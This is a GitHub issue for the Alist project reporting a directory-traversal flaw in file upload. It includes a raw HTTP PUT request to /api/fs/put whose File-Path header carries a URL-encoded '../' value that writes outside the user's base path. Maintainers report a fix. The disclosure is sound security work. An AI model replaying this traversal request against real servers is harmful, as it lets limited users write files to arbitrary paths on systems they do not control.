Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

Directory traversal file upload vulnerability #2449

Closed
4 tasks done
Shydlock opened this issue Nov 22, 2022 · 4 comments
Closed
4 tasks done

Directory traversal file upload vulnerability #2449

Shydlock opened this issue Nov 22, 2022 · 4 comments
Labels
bug Something isn't working

Comments

@Shydlock
Copy link

Shydlock commented Nov 22, 2022
edited
Loading

Please make sure of the following things

  • I have read the documentation.
  • I'm sure there are no duplicate issues or discussions.
  • I'm sure it's due to alist and not something else(such as Dependencies or Operational).
  • I'm sure I'm using the latest version

Alist Version / Alist 版本

v3.4.0(It seems like this problem still exists in version 3.5.1)

Driver used / 使用的存储驱动

Local

Describe the bug / 问题描述

  • A user with only file upload permission can bypass the base path restriction by using '... /' to bypass the base path restriction and upload files to an arbitrary path

  • I created a user 'test' with file upload permission only and set its base path to '/test'

image

  • My file directory structure is as follows

image

image

image

  • Login as 'test', found out that I am already in '/test'

image

  • And try to upload a file, catch the package and modified the 'File-path' parameter with '../'

image

image

  • Send the package, and login as 'admin' to check out the '/testPasswd'. Will find out that the file has been uploaded successfully.

image

Reproduction / 复现链接

Package:
PUT /api/fs/put HTTP/1.1
Host: 192.168.31.148:52000
Content-Length: 30530
Accept: application/json, text/plain, /
As-Task: false
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJleHAiOjE2NjkyOTQ4NTMsIm5iZiI6MTY2OTEyMjA1MywiaWF0IjoxNjY5MTIyMDUzfQ.DwnVRyCGUZ0Cx2B7s6kCqvrg_-rzQ7hf5tbbsy4RSVc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
File-Path: ..%2ftestPasswd%2ftestDirectoryTraversal
Content-Type: application/octet-stream
Origin: http://192.168.31.148:52000
Referer: http://192.168.31.148:52000/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

�PNG

Logs / 日志

None
@Shydlock Shydlock added the bug Something isn't working label Nov 22, 2022
@github-actions
Copy link

See

  1. 73% Upload files to the directory with password Vulnerability(bypass) #2444

@Shydlock
Copy link
Author

It seems like this problem still exists in version 3.5.1

@BoYanZh
Copy link
Contributor

BoYanZh commented Nov 30, 2022

It should have been fixed in b5bf5f4.

@xhofe xhofe closed this as completed Dec 9, 2022
@Chestnuts4
Copy link

it just can only upload PNG file?

@github-actions github-actions bot mentioned this issue Jan 17, 2023
Closed
4 tasks
# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@BoYanZh @xhofe @Shydlock @Chestnuts4